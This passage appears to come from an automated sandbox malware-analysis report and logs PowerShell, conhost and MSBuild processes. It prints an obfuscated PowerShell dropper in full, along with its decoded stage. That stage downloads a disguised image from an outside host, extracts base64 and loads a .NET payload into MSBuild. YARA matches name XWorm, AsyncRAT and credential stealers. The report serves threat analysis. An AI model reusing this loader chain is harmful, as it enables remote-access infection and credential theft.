MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	14
Start time:	07:59:32
Start date:	30/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreagBoDgTreGcDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHUDgTrecgDgTreuDgTreHcDgTrecwBhDgTreGsDgTrebwBkDgTreG0DgTrebwBiDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBNDgTreFMDgTreQgB1DgTreGkDgTrebDgTreBkDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	07:59:32
Start date:	30/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	16
Start time:	07:59:33
Start date:	30/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	09:50:54
Start date:	30/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x3b0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	18
Start time:	09:50:54
Start date:	30/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xcf0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 00000012.00000002.2549068549.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2501923304.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false